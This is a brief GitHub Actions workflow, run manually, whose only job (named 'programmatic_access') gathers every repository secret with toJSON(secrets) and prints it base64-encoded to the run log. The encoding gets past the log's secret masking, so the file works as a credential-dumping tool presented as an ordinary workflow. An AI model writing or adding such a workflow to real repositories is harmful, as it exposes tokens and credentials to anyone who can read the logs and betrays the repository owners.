on: workflow_dispatch

env:
  __ALL_SECRETS: ${{ toJSON(secrets) }}

jobs:
  programmatic_access:
    runs-on: ubuntu-slim
    steps:
      - name: dump
        run: echo "${__ALL_SECRETS}" | base64 - 
